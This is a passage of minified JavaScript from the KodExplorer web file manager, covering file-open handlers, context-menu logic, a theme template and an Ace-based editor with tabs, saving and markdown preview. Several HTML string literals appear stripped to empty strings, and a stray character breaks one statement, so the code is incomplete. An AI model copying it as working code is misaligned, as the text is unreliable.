    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/src/edit/edit",["./preview","./previewMarkdown","./functionList","./markdownTools","lib/ace/src-min-noconflict/ext-modelist"],function(e){var t={},a=void 0,i=e("./preview");e("lib/ace/src-min-noconflict/ext-modelist"),aceModeList=ace.require("ace/ext/modelist"),e.async("lib/ace/src-min-noconflict/ext-language_tools",function(){ace.config.loadModule("ace/ext/language_tools",function(){ace.snippetManager=ace.require("ace/snippets").snippetManager})}),e.async("lib/ace/emmet.min.js",function(){e.async("lib/ace/src-min-noconflict/ext-emmet",function(){ace.require("ace/ext/emmet")})});var n=ace.require("ace/lib/net");n.loadScript.hook("loadScript",n,function(){return"string"==typeof arguments[0]&&-1!==arguments[0].search("mode-php.js")&&(arguments[0]=arguments[0].replace("mode-php.js","mode-phhp.js")),arguments}),ace.config.moduleUrl.hook("moduleUrl",ace.config,function(){return-1!==arguments[0].search("php_worker")&&(arguments[0]=arguments[0].replace("php_worker","phhp_worker")),arguments});var o=ace.require("ace/mouse/default_handlers").DefaultHandlers;o.prototype.onMouseDown.hook("onMouseDown",o.prototype,function(){arguments[0].preventDefault=function(){return!0}});var s=ace.require("ace/virtual_renderer").VirtualRenderer;s.prototype.showComposition.hook("showComposition",s.prototype,function(){return this.session.selection.rangeCount>1?"hookReturn":void 0});var r=ace.require("ace/editor").Editor;r.prototype.$checkMultiselectChange.hook("$checkMultiselectChange",r.prototype,function(){return"hookReturn"});var l,c=function(e,a){if(void 0==a||void 0==e||1>t.length)return"";for(var i in t)try{if(t[i].kod[e]==a)return t[i].kod.uuid}catch(n){}return""},d=function(){var e={fontSize:"15px",theme:"tomorrow",showGutter:1,autoWrap:1,autoComplete:1,functionList:1,tabSize:4,softTab:1,displayChar:0,fontFamily:"Menlo",keyboardType:"ace"};for(var t in e)G.codeConfig[t]===void 0&&(G.codeConfig[t]=e[t]);autoFunctionList=parseInt(G.codeConfig.functionList),Toolbar.toolbarSelected(),x(),$("body").mouseup(function(e){var t=["markdown-menu-box","markdown-setting","markdown-help"];$.each(t,function(t,a){$(e.target).hasClass(a)||$(e.target).parent().hasClass("val")||0!=$(e.target).parents("."+a).length||$("."+a).addClass("hidden")})}),Mousetrap.bind(["ctrl+f","command+f"],function(e,t){switch(stopPP(e),t){case"ctrl+f":case"command+f":break;default:}})},p=function(e){var t=core.pathExt(e),a=aceModeList.getModeForPath(e).name;if("text"==a)for(var i in Editor.fileOpenMode)if(-1!=$.inArray(t,Editor.fileOpenMode[i])){a=i;break}return a},u=function(e){var a,i="id_"+UUID();if(void 0==e||""==e||"undefined"==e)return a={uuid:i,name:"newfile.txt",charset:"utf-8",filename:"",mode:p("test.txt"),theUrl:""},Hook.trigger("editor.initAdd.before",a),f(a),m(a),$(".edit-body .this").removeClass("this"),$(".edit-body pre#"+i).parent().addClass("this"),$(".tab-"+a.uuid).removeClass("loading"),N(),v(),Toolbar.toolbarSelected(),Hook.trigger("editor.initAdd.ready",t[i]),void 0;var n=e;if("http"==e.substr(0,4)){var o=$.getUrlParam("name",e),s=$.getUrlParam("downFilename",e);o?n=urlDecode(o):s&&(n=urlDecode(s))}a={charset:"utf-8",uuid:i,name:core.pathThis(n),filename:n,mode:p(n),theUrl:""},"http"==e.substr(0,4)&&(a.filename=""),Hook.trigger("editor.initAdd.before",a),f(a),t[a.uuid]={kod:{filename:a.filename}},core.fileGet(e,function(e,n,o){if(a.theUrl=o,$(".tab-"+a.uuid).removeClass("loading"),!n||!n.code)return A(a.uuid),Tips.tips(n);if(0==$("#"+a.uuid).length)return A(a.uuid),void 0;var s=n.data,r="";if("php"==s.ext&&0==s.content.indexOf(r)){var l=s.content.substr(r.length);s.content=r+js_beautify(l),a.mode=p("test.json")}"oexe"==s.ext&&(s.content=js_beautify(s.content)),t[i]=void 0,$("#"+i).text(s.content),m(a);var c=t[i];c.kod.charset=s.charset,c.kod.base64=s.base64,c.navigateTo(0),c.moveCursorTo(0,0),R(),N(),v(),Toolbar.toolbarSelected(),Hook.trigger("editor.initAdd.ready",c)},function(e){A(a.uuid),e||(e=LNG.error),Tips.tips(e,!1)})},f=function(t){var a=core.iconSmall(core.pathExt(t.name)),i='
    '+'
    '+a+htmlEncode(t.name)+"
    "+' '+'
    '+"
    ";$(i).insertBefore(".edit-tab .add");var n=e("./tpl/editTabContent.html"),o=template.compile(n),s=o({LNG:LNG,uuid:t.uuid});if($(".edit-body .tabs").append(s),y(t.uuid),Tap.resetWidth("add"),x(),"markdown"==t.mode&&$.getUrlParam("sid")){var r=$("#"+t.uuid).parent(".edit-content");r.addClass("markdown-full-page")}},h=function(e){clearTimeout(l),l=!1,l=setTimeout(function(){try{e.kod.preview.editChange()}catch(t){}},300)},m=function(e){var a=ace.edit(e.uuid),n=a.getSession();a.setTheme("ace/theme/"+G.codeConfig.theme),void 0!=e.mode&&a.getSession().setMode("ace/mode/"+e.mode),n.setTabSize(parseInt(G.codeConfig.tabSize)),n.setUseSoftTabs(parseInt(G.codeConfig.softTab)),n.setUseWrapMode(parseInt(G.codeConfig.autoWrap)),a.renderer.setShowGutter(parseInt(G.codeConfig.showGutter)),a.renderer.setScrollMargin(0,100,0,0),"ace"==G.codeConfig.keyboardType?a.setKeyboardHandler():a.setKeyboardHandler("ace/keyboard/"+G.codeConfig.keyboardType),a.setShowPrintMargin(!1),a.setPrintMarginColumn(120),a.$blockScrolling=1/0,a.setDragDelay(20),a.setShowInvisibles(parseInt(G.codeConfig.displayChar)),a.setFontSize(parseInt(G.codeConfig.fontSize)),a.setAnimatedScroll(!0),a.setOptions({enableEmmet:!0,enableSnippets:!0,enableBasicAutocompletion:!0,enableLiveAutocompletion:!0}),a.on("change",function(){_(a,!0),h(a)}),a.on("changeSelection",function(){M()}),a.commands.addCommand({name:"editSave",bindKey:{win:"Ctrl-S",mac:"Command-S",sender:"editor|cli"},exec:function(e){L(e.kod.uuid)}}),a.commands.addCommand({name:"editFunction",bindKey:{win:"Ctrl-Shift-E",mac:"Command-Shift-E",sender:"editor|cli"},exec:function(){Toolbar.doAction("functionList")}}),a.commands.addCommand({name:"preview",bindKey:{win:"Ctrl-Shift-S",mac:"Command-Shift-S"},exec:function(){Toolbar.doAction("preview")}}),a.commands.addCommand({name:"showKeyboardShortcuts",bindKey:{win:"Ctrl-Alt-h",mac:"Command-Alt-h"},exec:function(e){ace.config.loadModule("ace/ext/keybinding_menu",function(t){t.init(e),e.showKeyboardShortcuts()})}}),a.commands.addCommand({name:"convertUpper",bindKey:{win:"Ctrl-U",mac:"Command-U"},exec:function(e){e.toUpperCase()}}),a.commands.addCommand({name:"convertLower",bindKey:{win:"Ctrl-O",mac:"Command-O"},exec:function(e){e.toLowerCase()}}),a.commands.addCommand({name:"gotolineAt",bindKey:{win:"Ctrl-L",mac:"Command-L"},exec:function(){$(".top-toolbar .menu-view-goto-line").trigger("mousedown")}}),a.commands.addCommand({name:"convertIndent",exec:function(e,t){ace.config.loadModule("ace/ext/whitespace",function(a){var i={reset_size:G.codeConfig.softTab?" ":" ",to_space:" ",to_tabs:" "},n=i[t];e.session.setTabSize(G.codeConfig.tabSize),e.session.setUseSoftTabs(G.codeConfig.softTab),a.detectIndentation(e.session),a.convertIndentation(e.session,n,G.codeConfig.tabSize),a.trimTrailingSpace(e.session,n)})}}),a.commands.addCommand({name:"phpBeautify",bindKey:{win:"Ctrl-Shift-B",mac:"Command-Shift-B"},exec:function(e){return"ace/mode/php"!=e.session.$modeId?(Tips.tips("Only for php mode!","warning"),void 0):(ace.config.loadModule("ace/ext/beautify",function(t){t.beautify(e.session)}),void 0)}}),a.commands.addCommand({name:"find",bindKey:{win:"Ctrl-F",mac:"Command-F"},exec:function(e){ace.config.loadModule("ace/ext/searchboxKod",function(t){t.Search(Editor,e)})}}),a.commands.addCommand({name:"replace",bindKey:{win:"Ctrl-H",mac:"Command-Option-F"},exec:function(e){ace.config.loadModule("ace/ext/searchboxKod",function(t){t.Search(Editor,e,!0)})}}),a.commands.addCommand({name:"closeSearchBar",bindKey:"Esc",exec:function(){Editor.searchBox&&Editor.searchBox.hide()}}),a.commands.addCommand({name:"preview",bindKey:{win:"Ctrl-alt-G",mac:"Ctrl-command-G"},exec:function(e){e.findAll(e.session.getTextRange()),M()}}),a.commands.addCommand({name:"refresh",bindKey:{win:"F5",mac:"F5"},exec:function(){Toolbar.doAction("refresh")}}),e.mode||(e.mode=""),a.kod={mode:e.mode,uuid:e.uuid,name:e.name,base64:!1,charset:"utf-8",theUrl:e.theUrl,filename:e.filename},a.hasChanged=!1,t[e.uuid]=a,b(),a.kod.preview=new i(a)},v=function(){var e=P();if(e){e.focus(),e.resize();try{var t=window.parent.$.dialog.list.openEditor,a=Editor.current().kod.filename;a||(a=Editor.current().kod.name);var i=''+htmlEncode(a);if(t){t.title(i);var n=G.appHost+"editor/edit";G.sid!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid),n=n+"#filename="+urlEncode(a),window.parent.$(".openEditor .aui-content iframe").attr("src",n)}}catch(o){}$("title").text(core.pathThis(a))}},g=function(e,t){try{Editor.current().completer.popup.hide()}catch(i){}$(".edit-tab .this").removeClass("this"),$(".edit-tab .tab-"+e).addClass("this"),a=e,t&&$(".edit-tab .this").stop(!0,!0).animate({opacity:.5},50).animate({opacity:.8},50).animate({opacity:.5},50).animate({opacity:1},50,function(){}),v(),M(),j(),N(),Toolbar.toolbarSelected(),b(),Hook.trigger("editor.selectTab",Editor.current())},b=function(){var e=P();e&&void 0!==e.kod&&Editor.searchBox&&Editor.searchBox.isShow()&&(Editor.searchBox.setEditor(Editor,Editor.current()),Editor.searchBox.find(!1,!1,!0))},y=function(e,t){if(void 0!=e&&""!=e){$(".edit-body .this").removeClass("this"),$(".edit-body #"+e).parent().addClass("this"),g(e,t);var a=$(".tab-"+e).attr("data-name");D(function(e){e.ui.tree.setSelect(a)})}},k=function(e,i,n){var o=t;$.extend(!0,{},G.codeConfig),void 0!=n&&(o={},o[n]?o[n]=t[n]:o[a]=t[a]);var s=function(e){var t=Number(!Number(e));return isNaN(t)?0:t};i!==void 0?G.codeConfig[e]=i:(G.codeConfig[e]=s(G.codeConfig[e]),i=G.codeConfig[e]),Toolbar.toolbarSelected();for(var r in o){var l=o[r];if(l&&l.kod&&l.resize)switch(-1!=$.inArray(e,["fontSize","autoWrap","fontFamily"])&&h(l),e){case"theme":l.setTheme("ace/theme/"+i);break;case"tabSize":l.getSession().setTabSize(parseInt(i));break;case"showGutter":l.renderer.setShowGutter(parseInt(i));break;case"softTab":l.getSession().setUseSoftTabs(parseInt(i));break;case"fontSize":l.setFontSize(parseInt(i));break;case"autoWrap":l.getSession().setUseWrapMode(parseInt(i));break;case"displayChar":l.setShowInvisibles(parseInt(i));break;case"fontFamily":x();break;case"keyboardType":"ace"==G.codeConfig.keyboardType?l.setKeyboardHandler():l.setKeyboardHandler("ace/keyboard/"+G.codeConfig.keyboardType);break;case"functionList":break;case"autoComplete":l.setOptions({enableLiveAutocompletion:G.codeConfig[e]}),l.$enableBasicAutocompletion=G.codeConfig[e]; -break;default:}}$.ajax({url:G.appHost+"editor/setConfig&k="+e+"&v="+G.codeConfig[e],dataType:"json",success:function(){}})},x=function(){var e=G.codeConfig.fontFamily;e="'"+e+"',Monaco,Menlo,Consolas,source-code-pro,'Liberation Mono','Ubuntu Mono',Courier,'Helvetica Neue','Microsoft Yahei','微软雅黑','Lantinghei SC',STXihei,WenQuanYi,sans-serif",$(".ace-editor-content").css("font-family",e)},w=function(e){var a=t;for(var i in a){var n=a[i];if(n&&n.kod&&n.resize)switch(e){case"resize":n.resize();break;case"setting":n.commands.exec("showSettingsMenu",n);break;default:}}"resize"==e&&N()},N=function(){var e=P();if(e){var t=$("#"+e.kod.uuid).parent().find(".edit-right-frame"),a=0;t.hasClass("hidden")||(a=100*(t.width()/$(window).width())),$(".edit-body .bottom-toolbar").css("right",a+"%")}},_=function(e,t){t!=e.hasChanged&&(e.hasChanged=t,$(".edit-tab .tabs .tab-"+e.kod.uuid).toggleClass("edit-changed"))},L=function(e,i){if(void 0!=a){void 0==e&&(e=a),void 0==i&&(i=!1);var n=t[e];if(void 0==n||""==n)return Tips.tips(LNG.data_error,"warning"),void 0;if(n.hasChanged){P().focus();var o=n.kod.filename;""==o?core.api.pathSelect({type:"file",title:LNG.newfile_save_as},function(e){T(n,e,i)}):T(n,o,i)}}},C=function(){for(var e in t)""!=t[e].kod.filename&&L(e)},T=function(e,t,a){if("view"===e.kod.tabType)return Tips.tips(LNG.error,"warning"),void 0;var i={path:t,charset:e.kod.charset,filestr:e.getValue()};e.kod.charsetSave&&(i.charsetSave=e.kod.charsetSave);var n=G.appHost+"editor/fileSave";G.sharePage!==void 0&&(n=G.appHost+"share/fileSave&user="+G.user+"&sid="+G.sid),e.kod.base64&&(i.base64="1",i.filestr=base64Encode(i.filestr)),i.filestr=urlEncode(i.filestr),""==e.kod.filename&&(i.create_file=1),Tips.loading(LNG.getting,!0),$(".tab-"+e.kod.uuid).addClass("loading"),$.ajax({type:"POST",dataType:"json",url:n,data:i,error:core.ajaxError,success:function(i){return $(".tab-"+e.kod.uuid).removeClass("loading"),i.code?(Tips.close(LNG.success,!0),""==e.kod.filename&&(e.kod.filename=t,S(e)),_(e,!1),v(),a&&A(e.kod.uuid),void 0):(Tips.close(i,!1),void 0)}})},S=function(e){var t=e.kod.filename;e.kod.name=core.pathThis(t),e.kod.mode=p(t),e.kod.theUrl=G.appHost+"editor/fileGet&filename="+t;var a=$(".tab-"+e.kod.uuid);a.attr("title",t),a.find(".name").html(e.kod.name)},E=function(e){if(void 0==e&&(e=a),void 0==t[e])return A(e),void 0;var i=t[e];i.hasChanged?$.dialog({title:LNG.warning,resize:!1,background:"#fff",opacity:.4,lock:!0,icon:"question",content:i.kod.name+"
    "+LNG.if_save_file,padding:40,button:[{name:LNG.button_save,focus:!0,callback:function(){L(e,!0)}},{name:LNG.button_not_save,callback:function(){A(e)}}]}):A(e)},A=function(e){delete t[e];var a="",i=$(".edit-tab .tab"),n=$(".edit-tab .tab-"+e),o=$(".edit-body pre#"+e).parent();n.removeClass("edit-tab-menu"),n.hasClass("this")?($(i[0]).attr("uuid")==e?a=$(i[1]).attr("uuid"):i.each(function(){var t=$(this).attr("uuid");return t==e?!1:(a=t,void 0)}),""!=a&&$(".edit-body pre#"+a).addClass("this"),o.remove(),Tap.resetWidth("remove",n,a)):(o.remove(),Tap.resetWidth("remove",n)),j()},j=function(){0==$(".edit-body .tabs .edit-content").length?(P()&&P().kod.preview.close(),$(".disable-mask,.introduction").removeClass("hidden"),$(".bottom-toolbar").addClass("hidden"),$(".edit-body .tabs").addClass("hidden")):($(".disable-mask,.introduction").addClass("hidden"),$(".bottom-toolbar").removeClass("hidden"),$(".edit-body .tabs").removeClass("hidden")),D(function(e){var t=[];$(".edit-tab .tabs .edit-tab-menu").each(function(){var e=$(this).attr("data-name");e&&t.push(e)}),e.ui.fileHistory(t)})},D=function(e){ShareData.frameTop("",function(t){t.core&&t.core.isApp("editor")&&0!=t.$("#page-editor").length&&"function"==typeof e&&e(t)})},z=function(){for(var e in t)try{if(t[e].hasChanged)return!0}catch(a){}return!1},I=function(e){core.setSkin(e)},P=function(){return a&&t[a]&&t[a].focus?t[a]:!1},O=function(e){var a=P();e&&(a=t[e]);var i=a.kod.theUrl,e=a.kod.uuid;return""==i?(Tips.tips(LNG.not_exists,"warning"),void 0):($(".tab-"+e).addClass("loading"),Tips.loading(LNG.loading),i+="&charset="+a.kod.charset,core.fileGet(i,function(t,i){Tips.close(),$(".tab-"+e).removeClass("loading");var n=i.data,o="";if(null==n.content&&(n.content=""),"php"==n.ext&&0==n.content.indexOf(o)){var s=n.content.substr(o.length);n.content=o+js_beautify(s)}"oexe"==n.ext&&(n.content=js_beautify(n.content)),a.kod.charset=n.charset,a.kod.base64=n.base64,a.getSession().setValue(n.content);var r=a.getFirstVisibleRow();a.scrollToLine(r),_(a,!1)},function(t){t||(t=LNG.error),Tips.close(t),Tips.tips(t,!1),$(".tab-"+e).removeClass("loading")}),void 0)},R=function(){ShareData.data("FILE_SEARCH_AT")&&setTimeout(function(){for(var e=ShareData.data("FILE_SEARCH_AT"),t=P(),a={row:e.line-1,column:0};e.lineIndex-->=0;){t.selection.moveTo(a.row,a.column);var i=-1==e.lineIndex?!0:!1,n=t.find(e.search,{},i);a=n.end}t.session.highlight(t.$search.$options.re),t.renderer.updateBackMarkers(),ShareData.remove("FILE_SEARCH_AT")},100)},H=function(e){e||(e=G.codeConfig.theme);var t=["ambiance","idle_fingers","monokai","pastel_on_dark","twilight","solarized_dark","tomorrow_night_blue","tomorrow_night_eighties"];return inArray(t,e)?!0:!1},M=function(){var e=Editor.current();if(e){var t=e.selection.getCursor(),a=t.row+1+":"+(t.column+1);e.selection.rangeCount>1&&(a+=" ["+e.selection.rangeCount+"]");for(var i=e.selection.getAllRanges(),n=0,o=0,s=0;i.length>s;s++){var r={start:i[s].start,end:i[s].end},l=e.selection.doc.getTextRange(r);n+=l.length,o+=r.end.row-r.start.row+1}n>0&&(a+=" ("+n+" ~ "+o+")"),$(".editor_position").html(a)}};return{init:d,current:P,getParentEditor:D,hasFileSave:z,setChanged:_,saveConfig:k,doAction:w,setTheme:I,isBlackTheme:H,select:y,remove:E,save:L,saveall:C,refresh:O,getFileMode:p,aceModeList:aceModeList,add:function(e){e=urlDecode(e);var t=c("filename",e);""!=t?(y(t,!0),R()):u(e)}}}),define("app/src/edit/preview",["./previewMarkdown","./functionList","./markdownTools"],function(e){return function(t){var a=$("#"+t.kod.uuid).parent(".edit-content"),i=a.find(".edit-right-frame"),n=$("#"+t.kod.uuid),o=a.find(".function-list-frame"),s=a.find(".preview-url-frame"),r=a.find(".preview-markdown-frame"),l=e("./previewMarkdown"),c=e("./functionList"),d=e("./markdownTools"),p=new l(t),u=new c(t),f=10,h=function(){a.find(".preview-url-tool input").keyEnter(_);var e=a.find(".resize"),t=0;e.drag({start:function(){t=i.width(),e.addClass("resize-active"),$("body").css("cursor","col-resize"),i.append('
    '),i.addClass("can-not-select")},move:function(a){var o=t-a,s=$(window).width();o>=s-f&&(o=s-f),f>=o&&(o=f),n.width(s-o),i.width(o),e.css("left",s-o+"px")},end:function(){e.removeClass("resize-active"),$("body").css("cursor","default"),i.find(".mask-view").remove(),i.removeClass("can-not-select"),m()}})},m=function(){if(0==$(".markdown-full-page").length){if(i.is(":visible")){var e=i.width(),t=$(window).width();e>=t-f&&(e=t-f),f>=e&&(e=f);var s=100*parseFloat(e/t);i.width(s+"%"),n.width(100-s+"%");var l=a.find(".resize");l.css("left",100-s+"%"),o.is(":visible")&&i.attr("data-size-width",e),r.is(":visible")&&p.refreshScroll()}Editor.doAction("resize")}},v=function(){a.find(".edit-right-frame .box a,.function-list-tool .box a,[markdown-action]").bind("click",function(t){var i=$(this).attr("class");switch($(this).attr("markdown-action")&&(i=$(this).attr("markdown-action")),i){case"tool-markdown-menu":if(a.find(".markdown-menu-box").toggleClass("hidden"),!a.find(".markdown-menu-box").hasClass("hidden")){var n=p.markdownMenu(a.find(".markdown-preview"));a.find(".markdown-menu-box .content").html(n)}break;case"tool-markdown-download-html":p.markdownDownload(a.find(".markdown-preview").html(),"html");break;case"tool-markdown-download-pdf":p.markdownDownload(a.find(".markdown-preview").html(),"pdf");break;case"tool-markdown-download-markdown":p.markdownDownload("","md");break;case"tool-markdown-full":a.toggleClass("markdown-full"),a.hasClass("markdown-full")&&(a.find(".ace_editor").css("width","50%"),a.find(".edit-right-frame").css("width","50%"),a.find(".resize").css("left","50%")),Editor.doAction("resize");break;case"tool-markdown-setting":a.find(".markdown-setting").toggleClass("hidden");break;case"tool-markdown-help":if(""==a.find(".markdown-help .content").html()){var n="";n="zh-CN"==G.lang||"zh-TW"==G.lang?e("./tpl/markdownHelpCN.html"):e("./tpl/markdownHelp.html"),a.find(".markdown-help .content").html(n)}a.find(".markdown-help").toggleClass("hidden");break;case"tool-markdown-max":a.toggleClass("markdown-full-page"),a.hasClass("markdown-full-page")||m();break;case"tool-open-url":y();break;case"tool-refresh":_();break;case"tool-close":N();break;case"tool-markdown-help":break;default:}return stopPP(t),!1})},g=function(e){var l=0;if(i.removeClass("hidden"),o.addClass("hidden"),r.addClass("hidden"),s.addClass("hidden"),a.find(".resize").removeClass("hidden"),"function-list"==e)o.removeClass("hidden"),l=200,u.refresh(),i.find(".function-search input").focus();else if("markdown"==e)l=.51*$(window).width(),r.removeClass("hidden"),p.refresh(),d.bindEvent(a,t);else if("html"==e){l=.5*$(window).width(),s.removeClass("hidden");var c=t.kod.filename;c=core.path2url(c),i.find(".preview-url-tool input").val(c),i.find("iframe").attr("src",c)}i.css({width:l}),n.css({width:$(window).width()-l}),m()},b=function(){o.hasClass("hidden")?r.hasClass("hidden")||p.refresh():u.refresh()},y=function(e){if(r.hasClass("hidden"))window.open(a.find(".preview-url-frame input").attr("value"));else{var t=p.markdown2html(a.find(".markdown-preview").html()),i=window.open("","_blank","");i.document.open("text/html","replace"),i.opener=null,i.document.write(t),i.document.close()}stopPP(e)},k=function(){return u.support(t.kod.mode)?(o.hasClass("hidden")?(autoFunctionList=1,g("function-list")):(autoFunctionList=0,N()),Editor.saveConfig("functionList",autoFunctionList),void 0):(Tips.tips(LNG.not_support,"warning"),void 0)},x=function(){i.hasClass("hidden")?w()||g("html"):r.hasClass("hidden")&&g("html")},w=function(){return autoFunctionList&&u.support(t.kod.mode)?(g("function-list"),!0):"markdown"==t.kod.mode?(g("markdown"),!0):!1},N=function(){(s.hasClass("hidden")||!w())&&(i.addClass("hidden"),o.addClass("hidden"),r.addClass("hidden"),s.addClass("hidden"),a.find(".resize").addClass("hidden"),$(".markdown-full-page").removeClass("markdown-full-page"),n.css("width","100%"),Editor.doAction("resize"))},_=function(){var e=a.find(".preview-url-tool input"),t=e.attr("value");a.find(".open-browser").attr("href",t),a.find("iframe").attr("src",t)},L=function(){h(),v(),w();var e,n=function(){clearTimeout(e),e=!1,e=setTimeout(function(){o.is(":visible")&&(i.width(i.attr("data-size-width")),m())},10)};$(window).bind("resize",n),d.bindEvent(a,t)};return L(),{open:g,editChange:b,close:N,resize:m,openFunctionList:k,previewForce:x}}}),define("app/src/edit/previewMarkdown",[],function(e){var t=function(e){var t="";return e.find("h1,h2,h3,h4,h5,h6").each(function(){var e="markdown-"+$(this).text().replace(/\s+/g,"-"),a="markdown-menu-"+$(this)[0].tagName.toLowerCase();$(this).attr("data-link","#"+e),t+='
  • '+$(this).text()+"
  • "}),t="
      "+t+"
    "},a=function(e){e.find("a").attr("target","_blank");var a="

    [TOC]

